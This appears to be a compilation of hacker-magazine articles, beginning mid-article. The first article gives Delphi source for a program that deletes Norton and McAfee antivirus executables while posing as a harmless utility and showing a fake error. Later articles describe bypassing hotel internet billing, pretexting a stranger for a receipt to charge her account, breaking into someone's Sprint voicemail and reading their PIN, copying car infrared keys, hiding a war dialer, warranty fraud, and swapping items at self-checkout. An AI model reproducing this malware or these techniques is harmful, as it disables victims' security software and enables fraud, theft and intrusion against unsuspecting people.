It's easy to get lists of .exe files and their default install locations without shelling out for all the packages. I got mine by downloading demo versions. I expect there's an easier way to read the tree for each AVS package, but I wanted to get something going quickly to see if the AVS software would pick it up. It doesn't, as far as I can tell. Therefore, this could be sent via e-mail systems which check for virii and the like.
The trusting user, seeing the app pass the online scan, would then download and run it on their own system. The effect is to leave the "shell" of the AVS on the machine, while removing all the working parts. Kind of like stealing a PC from the inside, leaving the empty case behind. The deleted files cannot be recovered by going to our old friend the recycle bin. To the typical user, they will be irretrievable, and the AVS will require a reinstallation.

This is obviously Not Good. I don't like the idea that I could pay for an AVS designed to protect my PC that could be knocked out by a program which any novice with a bare modicum of programming skills could write, plus the fact that if the person who sent the file was targeting a specific PC/group of PCs, they would be vulnerable to all virii etc. once the initial AVS De-exe-r had been run.

I know that this program isn't a virus. It's a program that does what it's supposed to. But it seems hopelessly lame to me that AVS programs aren't able to protect themselves against such a blatant, obvious attack.

My program, once it has removed the AVS .exe files, displays a little message box saying how the program is incompatible with that version of Windows. The AVS De-exe-r can obviously be called, and touted as, anything else. A useful memory optimizer, for example. It then shows a window with all the standard menu bar items (disabled) and an error message. It has an option for reading the details of the "fault." All cosmetic doohickeys that serve to trick the user into believing that this was simply a program that failed to work, like so many free downloads.

I guess now maybe it's the turn of the guys who get paid to make these AVS things to sort this out. This took me approximately five minutes to write. Because I believe in responsible hacking, the only PC I've used it on is my own. Naturally (here it comes), what you do with the information contained in this article is up to you.
You know the laws in your own countries, etc., etc., etc. You know the score. ENDPREACHO. Sorry, but I always find those bits quite fun. OK, that's enough.

The bones of the prog are below. If you want to use Delphi, I believe you can get free versions at www.borland.com. If you want to try out my app (on your own PCs only!) then email me.

    //main listing for AVS-De-exe-r as whatnotted in Object Pascal using Delphi 7
    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, StdCtrls, Menus;

    type
      TForm1 = class(TForm)
        Button1: TButton;
        Label1: TLabel;
        ListBox1: TListBox;
        MainMenu1: TMainMenu;
        File1: TMenuItem;
        Register1: TMenuItem;
        Search1: TMenuItem;
        View1: TMenuItem;
        Tools1: TMenuItem;
        Window1: TMenuItem;
        Help1: TMenuItem;
        Memo1: TMemo;
        Button2: TButton;
        procedure FormCreate(Sender: TObject);
        procedure Button1Click(Sender: TObject);
        procedure Button2Click(Sender: TObject);
      private
        { Private declarations }
      public
        { Public declarations }
      end;

    var
      Form1: TForm1;

    implementation

    {$R *.dfm}

    procedure TForm1.FormCreate(Sender: TObject);
    begin
      // Each test below removes one AVS executable if it is present.
      if fileExists('C:\Program Files\Navnt\alertsvc.exe') then
        begin deleteFile('C:\Program Files\Navnt\alertsvc.exe'); end;
      if fileExists('C:\Program Files\Navnt\BackLog.exe') then
        begin deleteFile('C:\Program Files\Navnt\BackLog.exe'); end;
      if fileExists('C:\Program Files\Navnt\BootWarn.exe') then
        begin deleteFile('C:\Program Files\Navnt\BootWarn.exe'); end;
      if fileExists('C:\Program Files\Navnt\DefAlert.exe') then
        begin deleteFile('C:\Program Files\Navnt\DefAlert.exe'); end;
      if fileExists('C:\Program Files\Navnt\n32scanw.exe') then
        begin deleteFile('C:\Program Files\Navnt\n32scanw.exe'); end;
      if fileExists('C:\Program Files\Navnt\navapsvc.exe') then
        begin deleteFile('C:\Program Files\Navnt\navapsvc.exe'); end;
      if fileExists('C:\Program Files\Navnt\navapw32.exe') then
        begin deleteFile('C:\Program Files\Navnt\navapw32.exe'); end;
      if fileExists('C:\Program Files\Navnt\alertsvc.exe') then
        begin deleteFile('C:\Program Files\Navnt\alertsvc.exe'); end;
      if fileExists('C:\Program Files\Navnt\alertsvc.exe') then
        begin deleteFile('C:\Program Files\Navnt\alertsvc.exe'); end;
      if fileExists('C:\Program Files\Navnt\alertsvc.exe') then
        begin deleteFile('C:\Program Files\Navnt\alertsvc.exe'); end;
      if fileExists('C:\Program Files\Navnt\alertsvc.exe') then
        begin deleteFile('C:\Program Files\Navnt\alertsvc.exe'); end;
      if fileExists('C:\Program Files\Navnt\navapw32.exe') then
        begin deleteFile('C:\Program Files\Navnt\navapw32.exe'); end;
      if fileExists('C:\Program Files\Navnt\NavUStub.exe') then
        begin deleteFile('C:\Program Files\Navnt\NavUStub.exe'); end;
      if fileExists('C:\Program Files\Navnt\navwnt.exe') then
        begin deleteFile('C:\Program Files\Navnt\navwnt.exe'); end;
      if fileExists('C:\Program Files\Navnt\NPSCheck.EXE') then
        begin deleteFile('C:\Program Files\Navnt\NPSCheck.EXE'); end;
      if fileExists('C:\Program Files\Navnt\npssvc.exe') then
        begin deleteFile('C:\Program Files\Navnt\npssvc.exe'); end;
      if fileExists('C:\Program Files\Navnt\NSPlugin.exe') then
        begin deleteFile('C:\Program Files\Navnt\NSPlugin.exe'); end;
      if fileExists('C:\Program Files\Navnt\NTaskMgr.exe') then
        begin deleteFile('C:\Program Files\Navnt\NTaskMgr.exe'); end;
      if fileExists('C:\Program Files\Navnt\nvlaunch.exe') then
        begin deleteFile('C:\Program Files\Navnt\nvlaunch.exe'); end;
      if fileExists('C:\Program Files\Navnt\POProxy.exe') then
        begin deleteFile('C:\Program Files\Navnt\POProxy.exe'); end;
      if fileExists('C:\Program Files\Navnt\qconsole.exe') then
        begin deleteFile('C:\Program Files\Navnt\qconsole.exe'); end;
      if fileExists('C:\Program Files\Navnt\ScnHndlr.exe') then
        begin deleteFile('C:\Program Files\Navnt\ScnHndlr.exe'); end;
      if fileExists('C:\Program Files\Symantec\LiveUpdate\NDETECT.EXE') then
        begin deleteFile('C:\Program Files\Symantec\LiveUpdate\NDETECT.EXE'); end;
      if fileExists('C:\Program Files\Symantec\LiveUpdate\AUPDATE.EXE') then
        begin deleteFile('C:\Program Files\Symantec\LiveUpdate\AUPDATE.EXE'); end;
      if fileExists('C:\Program Files\Symantec\LiveUpdate\LUALL.EXE') then
        begin deleteFile('C:\Program Files\Symantec\LiveUpdate\LUALL.EXE'); end;
      if fileExists('C:\Program Files\Symantec\LiveUpdate\LuComServer.EXE') then
        begin deleteFile('C:\Program Files\Symantec\LiveUpdate\LuComServer.EXE'); end;
      if fileExists('C:\Program Files\Symantec\LiveUpdate\1.Settings.Default.LiveUpdate') then
        begin deleteFile('C:\Program Files\Symantec\LiveUpdate\1.Settings.Default.LiveUpdate'); end;
      if fileExists('C:\Program Files\Symantec\LiveUpdate\LSETUP.EXE') then
        begin deleteFile('C:\Program Files\Symantec\LiveUpdate\LSETUP.EXE'); end;
      if fileExists('C:\Program Files\McAfee\McAfee Internet Security\gd32.exe') then
        begin deleteFile('C:\Program Files\McAfee\McAfee Internet Security\gd32.exe'); end;
      if fileExists('C:\Program Files\McAfee\McAfee Internet Security\gdlaunch.exe') then
        begin deleteFile('C:\Program Files\McAfee\McAfee Internet Security\gdlaunch.exe'); end;
      if fileExists('C:\Program Files\McAfee\McAfee Security\gdcrypt.exe') then
        begin deleteFile('C:\Program Files\McAfee\McAfee Security\gdcrypt.exe'); end;
      if fileExists('C:\Program Files\McAfee\McAfee Security\GuardDog.exe') then
        begin deleteFile('C:\Program Files\McAfee\McAfee Security\GuardDog.exe'); end;
      if fileExists('C:\Program Files\McAfee\McAfee Security\IView.exe') then
        begin deleteFile('C:\Program Files\McAfee\McAfee Security\IView.exe'); end;
      if fileExists('C:\Program Files\McAfee\McAfee Firewall\cpd.exe') then
        begin deleteFile('C:\Program Files\McAfee\McAfee Firewall\cpd.exe'); end;
      if fileExists('C:\Program Files\McAfee\McAfee Components\VisualTrace\NeoTrace.exe') then
        begin deleteFile('C:\Program Files\McAfee\McAfee Components\VisualTrace\NeoTrace.exe'); end;
      if fileExists('C:\Program Files\McAfee\McAfee Components\Shredder\shred32.exe') then
        begin deleteFile('C:\Program Files\McAfee\McAfee Components\Shredder\shred32.exe'); end;
      if fileExists('C:\Program Files\McAfee\McAfee Components\QuickClean Lite\QClean.exe') then
        begin deleteFile('C:\Program Files\McAfee\McAfee Components\QuickClean Lite\QClean.exe'); end;
      if fileExists('C:\Program Files\McAfee\McAfee Shared Components\Instant Updater\RuLaunch.exe') then
        begin deleteFile('C:\Program Files\McAfee\McAfee Shared Components\Instant Updater\RuLaunch.exe'); end;
      if fileExists('C:\Program Files\McAfee\McAfee Components\Guardian\CMGrdian.exe') then
        begin deleteFile('C:\Program Files\McAfee\McAfee Components\Guardian\CMGrdian.exe'); end;
      if fileExists('C:\Program Files\McAfee\McAfee Components\Guardian\schedwiz.exe') then
        begin deleteFile('C:\Program Files\McAfee\McAfee Components\Guardian\schedwiz.exe'); end;
      if fileExists('C:\Program Files\McAfee\McAfee Components\Central\CLaunch.exe') then
        begin deleteFile('C:\Program Files\McAfee\McAfee Components\Central\CLaunch.exe'); end;
      // Cosmetic error shown to the user once the files are gone.
      showmessage('Could not find dev\null\drivers.dll Application failed to start.');
    end;

    procedure TForm1.Button1Click(Sender: TObject);
    begin
      Close;
    end;

    procedure TForm1.Button2Click(Sender: TObject);
    begin
      ListBox1.Visible := false;
      Memo1.Visible := true;
    end;

Hacking the Hilton
by Estragon

Many hotels are offering high-speed Internet access to people who stay there. Mostly this is via Ethernet cables, though some hotels also offer wireless. This article addresses one particular setup that we will probably be seeing a lot more of, which I got to use and experiment with at a Hilton hotel (at the Schiphol airport in Amsterdam, when my flight was canceled and I was forced to stay an extra day).

I think we'll be seeing a lot more of this type of integrated hotel system because it is very sophisticated and capable. It's not clear whether Hilton is using a standard vendor system or has merged several different types of systems, but the outcome is full integration of television (including games and pay per view), TV-based Internet (similar to WebTV), the hotel's information system (TV-based, to check out and see bill status), telephone, and of course high-speed Internet.

You can guess which one is of interest to the folks who are reading this: high-speed Internet. I will give a rundown of the system and some tips on how to get some time on the system without paying for it.
The details of the fully integrated system, which Hilton claims it will be rolling out to all hotels in the future, are probably different than most other hotels with high-speed Internet. But the Internet portion is pretty standard, and the workarounds are similar to what I've encountered at some other places.

OK, so here's the drill: You set up your laptop or whatever and plug in the standard Ethernet cable supplied on the hotel room's desk. You might need to reboot or otherwise tweak your system for it to recognize there is a new connection available. In other hotels, what happens next is that you open your web browser and try to visit a page, and instead are redirected to a web page by the Internet company (for example, STSN, which is found in many hotels such as the Sheraton chain).

But in the Hilton, once I plugged in, the TV came on and beeped annoyingly (the same beep they use for a wake-up call. It got my attention!). It said that I was trying to access the Internet and to enter a room number or PIN using the TV's remote control. This is actually a good security feature to make sure you didn't somehow get to the patch panel or some other open connection. You can't enter someone else's room number (I tried) because your Cisco unit's address (below) is linked to your room.

So you enter your room number. Next, it steps you through the process of rebooting your computer (obviously, intended for Microsoft users), then says to try to access the Internet.

This is where the free access begins. At this point your computer is (hopefully) connected and has received its IP address via DHCP. However, you did not yet confirm with the TV that you're accessing the Internet and have not loaded any web pages. The trick is that standard ports other than 80 are now open. I was able to ssh (port 22) to another computer on the Internet with the -X option (to tunnel X Window connections).
I could then start Mozilla or whatever app remotely and have it show up on my computer in the hotel room. (Of course, you need to login via an xterm or similar and have an X server on your computer.)

Unfortunately this bliss only lasted for ten minutes or so (you might get a little extra time by using the "Back" on the remote control and otherwise trying to reset any timers that are running). Eventually the TV beeps again and you're back at step one but your ssh session gets blocked. The good news is you can start over again and get another ten minutes of connectivity. But I was unable to continue my ssh session (even though the DHCP IP address was the same) and needed to reconnect.

Why bother trying to get ten minutes? Well, in this hotel (and probably all those with the same setup) charges for access are by the hour, not the day. I was paying ten euros per hour (about $12) once I gave up screwing around and tried to get some work done in segments longer than ten minutes, so I appreciated the extra "free" time. I checked the next day and also kept track of my time (the TV beeps after an hour to let you know your time is almost up), and confirmed that the extra 30 minutes or so I got in ten minute increments were not charged. Later, I saw that for about $40 a day you could get a package with unlimited Internet plus unlimited pay per view movies and other perks. Well, maybe that's worth it if you've got the need and the bucks.

Here's a little more information about the configuration. They are using Cisco 575 LRE Customer Premise Equipment (CPE) units in each hotel room (see http://www.cisco.com/warp/public/ce/pd/si/575/prodlit/index.shtml for specs). These were attached to the back of a digital TV and have two network connections, two power connections, and what looks like an active security monitoring device (so be careful if you try to move it around much).
The Cisco 575 LRE product sheet says it needs to connect to a Catalyst 2900 LRE XL switch, which is probably where the smarts are. The integration with the TV and billing system was not clear, but my guess is that the TV got its commands via the 575. These commands were probably from a separate computer in the building that also was doing the monitoring and billing for pay per view, security, etc.

I did all of the above with my portable Mac running OS X. Unfortunately, I didn't have nscan or other tools to try to probe the network further or sniff the network, and I didn't have enough time to grab them and experiment. Obviously if you could see their server for billing, etc. there would be opportunities to either try to fool the server or get access to it. If Hilton is smart, there would be very limited access from the server to the rest of the hotel infrastructure (otherwise, for example, access to non-critical services like in-room Internet and pay-per-view could yield access to critical services like door key-card encoding).

In closing, the system I used was definitely very cool, but had an easy and obvious way of bypassing the charging system for some free Internet. Even though it costs a lot of money to stay in a Hilton and pay (by the hour!) for Internet service, my guess is that these types of integrated systems (TV, Internet, games...) will be a lot more common in the future.

Cruise Cracking
by Jesters8
Jesters8@yahoo.com

Recently I went on vacation and I took a cruise through Alaska. I was sailing on the Carnival "Spirit." It was a good time, but as I got a little restless I wondered just what things of interest could be found onboard.

Background

Let me give a little background on how the technological aspects of the ship work. When you come onboard for the first time, every person receives a "Sail and Sign Card." At first it seemed like nothing more than a glorified room key,
but as the features of the card were explained, it seemed to be more and more useful. Not only did the magnetic strip card act as a room key, but it also was a credit card and photo ID to get back onboard the ship after we docked in a port. After I was issued a card, I stood in front of a booth and my picture was taken. I could see as I walked around behind the booth that it was a touch-screen computer that stored everyone's pictures. Later I learned that once someone boarded the ship again, the security officer only had to look at the stored photo (which would appear when the card was swiped) to make sure it was truly that person.

The cruise was what they referred to as a "cashless cruise." To buy something in the gift shop or bar, you gave them your card and signed a receipt, much like a credit card. Then, your room was billed and when you got home you wrote a check. The card designers had some sense when making their system. The card has a four digit ID number (called a "folio" number) but no room number, so if someone accidentally found your card, they couldn't break into your room unless they had some other way of knowing where you were staying.

Another interesting system used by the cruise was a way of ordering tickets to do different things onshore. With your TV, you used your remote to pick out something and then entered your folio number. The next morning tickets were delivered to your door. Along with ordering things, you could also see everything you had paid for by typing in your folio number. This seemed to have numerous voyeuristic possibilities, so to test it out I asked a friend of mine from a different room to enter his number on my TV. It seems they matched your folio number to your room number inside the purchase checking system, so your folio number could only be accessed through your own room. To further check this I rode on the elevator a few times, memorizing the folio numbers on cards people had out.
I returned to my room and found that all of the numbers that I knew were valid ID numbers could not be accessed from my TV.

The Internet Cafe

All of this leads me to the most interesting part of the ship for an inquisitive mind - the Internet Cafe. This was a library-like room on the ship with a dozen computers, although the only thing accessible was the monitor, keyboard, and mouse. The actual computer was inside a locked wooden cabinet. To get to use one of these machines you had to log in and suffer charges that equated to highway robbery. To log in, you typed in your first initial, last name, and room number as your username, and your folio number as your password (which could later be changed to anything). For example, if my name were John Smith, my login would be jsmith1234.

Not wanting to pay these exorbitant charges, but not wanting to really steal access, I resolved myself to poking around the system. To see if the login manager could be exited I tried every hotkey combination I could think of, all the Ctrl-, alt-, shift-, Ctrl-alt-, Ctrl-alt-shift-, etc. This proved fruitless. By right clicking, I learned that the login system was made in Flash and playing in Flash Player 6.0. Next, if I clicked on the option in the right click menu that said "About Macromedia Flash Player 6.0" for a brief moment the Taskbar appeared. If you were quick you could access a limited Start menu. It only allowed access to "Programs", but I was able to look at the "Start Up" menu. It had two executables that appeared to be written in VB, because it had that VB executable icon instead of the standard Windows one. The two programs were named "dsibillingxp.exe" and "sysckxp.exe".

Googling these names revealed that something called "sysck.exe" is a Motorola cable modem driver. However, this may not be related to the program on the ship's computers, because the ISP for the ship was Digital Seas, a satellite broadband ISP designed just for cruising ships.
I managed to crash the computer by trying to run dsibillingxp.exe. F8 was disabled as the computer rebooted, so I couldn't access safe mode or anything. I did learn that the machines were made by Compaq and running XP Pro. It didn't use the normal XP logon with the list of users and little pictures, but the Windows network login. Since it displayed the last login name, I found out the user name for the passengers' systems was "cruise". I tried common passwords and things that might seem logical, but I couldn't crack the password. It wouldn't be of much value even if I did because it would start the two programs and bring me right back to where I started. The default logins for administrator privileges and guest had been disabled.

I still wanted to see if it was possible to get access without paying, so it was time for a little social engineering. Since you needed a room number, a name, and a folio number, a room card would not be enough to get on a computer. There was one thing that had all this information, however. It was a receipt. When you bought something at the bar and signed for it, you kept the customer copy and this had your full name, room number, and folio number printed on it. There weren't exactly dumpsters onboard to go through, but I had an idea. I got a piece of paper with something printed on it and folded it over. I headed for the bar and approached a fifty-something woman (not trying to be sexist, but she seemed convincible). I told her I was playing in a family scavenger hunt and that one of the items was a drink receipt. I asked if I could have hers. She handed it over without hesitation.

Now being the good person I am, I wasn't going to do anything with her personal information. But the point is I could have. Anyone could have used it to quickly rack up hefty charges to her bill. In conclusion, their computer systems seemed secure to basic intrusion attempts, but the weakness in the system lies in the customers.
Greetz: MerlinI22 for always being there when I need him.

A Sprint PCS Trick
by quel

We all love to hate cell phone companies. But some in particular, like Sprint PCS, seem to go out of their way to try to screw you over. First, have you noticed that it costs you minutes to call your voicemail? For those of you with free Sprint to Sprint minutes this makes even less sense.

You might find this trick useful: 11-XXX-XXX-XXXX T - ** TT XXX-XXX-XXXX #. The first number is any other Sprint cell phone number. Don't worry, their phone won't ring. The second number is your phone. If you call your voicemail in this fashion then it will be billed as Sprint to Sprint minutes and you will be able to check your voicemail for free like you should have been able to all along. This was presented on Off The Hook not too long ago without an explanation. If you notice the dialing of two ones, it is obviously an erroneous number. But instead of a regular misdialed number message, you get Sprint's attempt to trap the number. As this message starts a ** will drop you into the Sprint voicemail system and then you are just left to dial your number. (The T's are two second pauses and how Sprint phones let you store them.) I am quite surprised Sprint hasn't tried to shut this down yet. Maybe this article will prompt action on their part.

The fun with Sprint's voicemail doesn't stop there. I'm sure many of you don't have your voicemail prompt you for your PIN out of convenience. Hopefully you will shortly be convinced to change the settings to always prompt.

If you have the actual person's phone then this is a trivial "hack" but without physical access to their phone we spend time with our dear friend the phone op. Simply ANI fail by op diverting and then supply them the number to the phone you want to call and then supply your destination number.
Yes, this will appear as if you are calling from the ANI to the same ANI. If the op gives you trouble you can always say something about your phone keypad having a number that's bad so you can't use your cell to call your voicemail.

Now you are in the target's voicemail, remotely or locally, unless they require the PIN to be entered. But, wait the fun doesn't stop, do you want to know their PIN number? (Perhaps it's their ATM pin or some other valuable number that they use everywhere?) Dial 3 for personal options, then 2 for administrative options, then 1 to turn skip pass code on. It will then immediately tell you the current code. At this point you have total access to their voicemail as well as their PIN number and the target is utterly helpless.

I'm sure this trick will work to get you into voicemails on many other cell phone companies and other systems. I hope more of you will learn to not have your PINs, passwords, etc. saved for you due to the grave security threat this poses.

Shouts to amatus, lucky225, arron, Ncongnmt, Cavorite, and clarkk.

Hacking a Mercedes Benz with a Universal Remote
by TOneZ2600

This article is intended as an educational reference. In no way should it be used to gain unlawful access. This includes breaking and entering as well as grand theft.

As we all see and know, Mercedes Benz makes the most common luxury vehicles. Prices for these cars go from (new) $24K to approximately $250K. After 1991 Mercedes Benz changed locking systems throughout their cars. From a steel key that had to be "laser" cut to a steel key with an infrared sensor attached to it and recently to just an IR remote. (No more steel key.)

The infrared sensor controller is attached to the key and aids in the keyless entry system. Older Mercedes Benz vehicles (91-99) have actual IR sensors for door locks and trunk release mechanisms.
Currently Saab, Volkswagen and other (semi) luxury vehicles have incorporated this new IR system for their vehicles.

When buying new IR keys for your vehicle, the key has to be "trained" to your car. This process takes anywhere from five minutes to five hours depending on the IR coding complexity. Once the key is trained, that's it.

So what does that do for me? Well, let's just say you left something in your car and you lost your key. How do you make an archive key from a Universal Remote? Simple.

First, you are going to have to obtain a remote that has a "learning" function. There are several remotes on the market with this feature. If you have a PDA that is IR equipped, I think the program "TV Remote Controller 5.5" will be suitable. Now grab your original IR key. The only thing that is left to do is to train the Unlock, Lock, and Trunk Release on your remote. This is done by selecting the button that you want to train and emitting an IR source from the original key.

It's that easy and that stupid to own an $80K car.

The $40 Hardware War Dialer
by Grandmaster Plague

Have you ever been on a pen-test, doing some reconnaissance or just poking around for fun, and thought about how great it would be to have a hardware war dialer that you weren't worried about using and losing? Well, here's the answer to your problems, and it's not as difficult as you might expect.

Overview

A war dialer is "a program that calls a given list or range of phone numbers and records those which answer with handshake tones (and so might be entry points to computer or telecommunications systems). Some of these programs have become quite sophisticated, and can now detect modem, fax, or PBX tones and log each one separately." War dialers are especially useful for exploring PBX networks and probing a particular target for a point of entry that may have been forgotten. Traditionally, a war dialer is used from a computer. This could be from a PC at one's home, school, etc. or a laptop out in the field. Advantages to a PC are the virtually unlimited power supply, and the fact that you know it's not going anywhere. Disadvantages to the PC are that one usually doesn't want the phone company to know you're dialing a thousand sequential numbers in a matter of an hour or so. Especially since they can trace you to where it's happening. If that happens to be your home or place of employment, you may not want the police keeping an extra watchful eye on what goes on there.

So the other alternative is a laptop. Great, you can leave it be wherever you want and let it dial and collect all the data it wants while remaining relatively worry-free about the whole police/telco situation. This also works great if you're testing a PBX and need it closer to the target (i.e., within the physical confines of the network). But doesn't this seem like overkill? Even a cheap laptop has a fancy color 12" LCD screen, a hard drive, a nice processor, and pretty good bit of RAM in it, not to mention network and video cards. And what if something happens while you're letting the wardialing software do its job? I don't know about you, but I don't want to leave my expensive laptop lying around for someone else to stumble upon and pick up while I'm waiting for results. Also, laptops are bulky. They're not exactly easy to conceal in those green TNI boxes while making their calls.

The Solution

The solution I propose has seemed obvious to many for years, but hasn't become economically practical until fairly recently. My solution includes three parts. A computer, a modem, and software. That simple. However, we're not just going to use any computer, modem, or software. We're going to use a PDA. Specifically, we're using a Palm V PDA. I picked one up on eBay with a hard case, cradle, and AC adapter for $22 (plus $10 S&H). The next thing we'll need is a Palm V modem.
This I got after a little price-watch browsing from a company called Compu-America for $4 (plus $4 S&H). Finally, we download TBA, the friendly PalmOS war dialer from the equally friendly Kingpin of AtStake (formerly the L0pht). So, we've got all three things now and it shouldn't take a genius to put them together. Hook up the palm to your computer and load in TBA. Charge the batteries, take it out of the cradle, plug in the Palm Modem, start up TBA, and you should be good to go as soon as you get a live dial tone.

Ideas

Now that you've got your $40 Hardware War Dialer ($22 for Palm plus $4 for modem, plus $14 S&H) up and running, what are you going to do with it? Well, just reading the TBA manual might give you some ideas. You've got a pretty small device (about .5" thick, 5" long, and 3.5" wide) that can be concealed anywhere. You could hide it in one of those green TNI boxes I was talking about and with one end of the phone line stripped and alligator-clipped you have a perfect beige box war dialer. If you're worried about power you can pick up an AC adapter for the modem for a few more bucks and plug it into the wall somewhere. The possibilities are endless, and hey, if you lose it or have it confiscated, no huge deal, right? You only spent forty bucks on it.

Alternatives

Sure, this isn't at all an original idea and it's been done before. I'm just trying to shed light on the fact that this can now be done easily and cheaply. I guess if you wanted to be hardcore you could hook up an external modem to a micro-controller and program the micro-controller yourself. However, there is still the issue of power (you'd either have to find a place for a battery or always plug it into the wall). Also, the cost of this would probably be prohibitive, unless you have a bunch of blank micro-controllers lying around and a development kit for them.
You also don't have the benefit of having a neat little Palm V to mess around with after you're done. And, an external modem with a micro-controller looks pretty nefarious when it's sitting on a desk plugged into a phone line for hours, at least far more so than a Palm V.

Credits and URLs

Definition from the Jargon Dictionary - http://info.astrian.net/jargon/terms/w/war_dialer.html
Product page for the Palm V modem located at http://www.compu-america.com/prodLG.jsp?prodld=fi083b8fb22
TBA can be obtained from http://www.atstake.com/research/tools/info_gathering/
The TBA Handbook is located at http://www.atstake.com/research/tools/info_gathering/tba_handbook.pdf

Hello once again Mary (Nary).

Serial Number Security
by TEV

How many products in shops have their serial numbers on display at all times? These numbers are printed onto boxes, packets, and products for the manufacturer to identify the product in question. Yet, as I'll show below, these numbers should be treated as securely as PIN numbers and passwords.

Do not do what is in this article. It is fraud and theft. As simple as that. This article contains nothing of a technical nature; I'm writing it to highlight a point and to get this noticed. Although I have outlined a simple scenario, don't do this. Once this gets read I'm sure companies will be able to spot it a mile away.

The example I will draw upon is optical mice. Let's look first at the Microsoft Intellimouse. This mouse costs around 25 pounds and upwards depending on the model. Go into your nearest PC World or other High Street retailer and go find these mice. I will place a large bet that throughout the world these will be on shelves for the customers to look at before purchasing. Some shops in the UK even have display models. The packaging for most of these is well designed to show the product off in all its glory, which includes a clear shot of the base of the mouse.
There are some important numbers, the P/N, and the PID (Product ID), and the model number. Write these details down and then go home without buying the mouse.

When you get home browse through to the Microsoft site for their technical help. Ring the technical helpdesk and report that your mouse has stopped working. Say something like "the glowing red light doesn't work." Anything so that the customer services agent thinks you're the average shopper and a little clueless. They'll ask you for the PID, P/N, and the model number. Once you've given them these numbers you'll be told one of two things depending on whether you have contacted Microsoft with a similar problem or not. You will either be asked for your address and told that a new mouse is now on its way (and the old one can be thrown away at your discretion) or that you need to cut the USB plug from the old mouse and post it to them before they send the mouse out. From what I've seen so far, ringing a week later and complaining that the cable must have gotten lost in the post because you definitely sent it works - they're just trying to test you a little.

Three things to note: Firstly don't panic about giving out your address. As you'll read later there are usually no follow up calls. Secondly, on one discussion with a customer service rep I was told that each customer is given three "goodwill gestures." If you ring a fourth time saying the cable was lost in the post etc. you get nothing. Microsoft allows three replacements and any more will arouse investigation. But then again, why the hell would anyone need four mice? And last but not least when the new mouse turns up feel free to register it and when it breaks ask for your legitimate replacement!

Now, why should I outline that very simple (simple as in if you can't do that give up now!) guide to social engineering? Imagine you're the person who went into the shop ten minutes after the evil fraudster and bought that mouse legitimately.
Six months later it breaks and you want it replaced. Tough. We rang up MS and tested this out by trying to claim a mouse from a serial number that a replacement had already been issued for. We were told that the product was registered and we should check our number. When we argued it we were asked to post the whole mouse back so they could change it. When we did this they changed the mouse and the original fraudster heard nothing.

This is stunning. Microsoft uses their pretty packaging to give easy access to the serial numbers of the products. These numbers are treated as if they were generic model numbers, but in reality they are the password to unlock your warranty.

Look around the same shop you found the mouse in. There are loads of small peripheral devices that do the same, and mice are the biggest culprit. And don't forget, most shops won't mind you opening a box to have a closer look, so long as it doesn't break any sealed boxes. Have a look around for other product keys and see what turns up. I'm not going to turn this into a guide to fraud but you will be able to find other items.

I wrote this article in order to highlight some real stupidity. Many large companies use a similar system, and seem to be operating on a huge amount of trust. Think about all that the serial numbers are used for in terms of support and warranty. Do you want your number published to the world? When I discussed this with a shop assistant at PC World I was told I should take it up with Microsoft. Not surprising, but when I discussed it with Microsoft I was told that it rarely happens and is not of any concern. I'm hoping that this wasn't the official company line.

Now that you've read this, go away and think hard about what I've highlighted. I honestly don't support fraud. What I have written is no different than stealing the mouse from the shop. It's just a new method that no one has addressed before.
If you work in hardware, make sure that your product's packaging isn't revealing too much. Too many products are turning up in see through plastic packets. I'm sure the product is gorgeous to look at but this makes it a bit too easy to access the important details. Why not simply cover the serial number with a small label and then package it? State on the box that the product should not be purchased if the label has been tampered with. I'm sure that it wouldn't cost that much to add a small label to cover a dozen or so characters. And to the people buying these products, when you get the item home, ring immediately and register this product with your name and don't open the packet. At that point you'll be told if someone else has registered the item. If it has been registered, explain the situation and then take the product back to the shop and exchange it for another or ask the manufacturer for a replacement with an unregistered warranty.

A big hello to all that know me and before flaming me, take a deep breath, count to ten and think happy thoughts. We all have different opinions and the world's a better place for them; just don't force them down someone's throat.

Barcode Tricks
by XlogicX
drkhypnos314@hotmail.com

There are a few ways to purchase a product with the price of another. Before I talk about that though, I'll review the meaning of the bars and numbers on the bar code. After that, I'll explain tricks like "inking" and the "sticker."

What bar-space combination will make a meaningful number? For UPC-A, there are about 23 different meaningful characters: one start guard, one center guard, one stop guard, ten left hand data characters, and ten right hand data characters. I specify right and left because the code is different on each side. Imagine the data characters as 7-bit binary words, where the 0 is a space, and a 1 is a line.

[Chart: bar patterns for the data characters 0 through 9]

Notice that all left-hand characters start with a 0 and end with a 1. Also, the right hand side is just the complement of the left-hand side; so if the bit were a 0 on the left for a certain character, it would be a 1 on the right for the same character. Another thing to notice is that there are two variable width spaces and lines per character, no more, no less.

Imagine the start and stop guards as a 3-bit character with the data being 101. These characters appear at the beginning and end of the code. The center guard is the 5-bit character 01010 - it appears in the center.

Now that we know how the characters are formed, how about the meaning of the numbers? The first number specifies what kind of application the bar code will have. 0, 6, and 7 mean that it is a normal UPC code. A 2 means it is a weighted item like produce. 3 is the National Drug and Health related code. A 4 means it is specific to that store. A 5 means it is a coupon (notice the "5" in the Coupon Trick article by Charles in 20:2). The other numbers are reserved.

The next five characters (2-6) are the manufacturers' code. For example, Post Grape Nuts is 0 43000 10370 8 and Post Waffle Crisps is 0 43000 10540 5. All Post products should have 43000 for digits 2-6. If a manufacturer has more than 100,000 different products, such as the store brand, then you might see different codes for the same brand in digits 2-6.

The next five characters (7-11) are the product code. The last character is the checksum, though it's a little more than a sum. To derive it by hand, you take the 1st, 3rd, 5th, 7th, 9th, and 11th numbers and add them up. Multiply that sum by three. Then add all the remaining numbers to that. Now what you want to do is add a number to that sum that will give you a number with the multiple of ten. The number you chose for that is the checksum. The original code that Charles had was 5 21000 23030 8. 5+1+0+2+0+0=8. 8*3=24. 24+2+0+0+3+3=32. 32+8=40, the next closest multiple of 10 (checksum being 8).

The Self-Checkout Switch: Prices may vary in this example. You purchase two 32oz Power-Aids ($1.49) and a 32oz Gatorade ($1.29) for the price of three Gatorades ($.40 savings). First, scan Gatorade, place it on the demagnetizer, and then put the Power-Aid in the bag/(scale). Do the same for next Power-Aid, and then do the Gatorade finally.

The advantages of this method are that it is mechanically easy and doesn't require much knowledge. The disadvantages of this method are that it only works for self-check out, and the supervisor of the self-checkout may still find your activities suspicious. Also, you need to find things around the same weight.

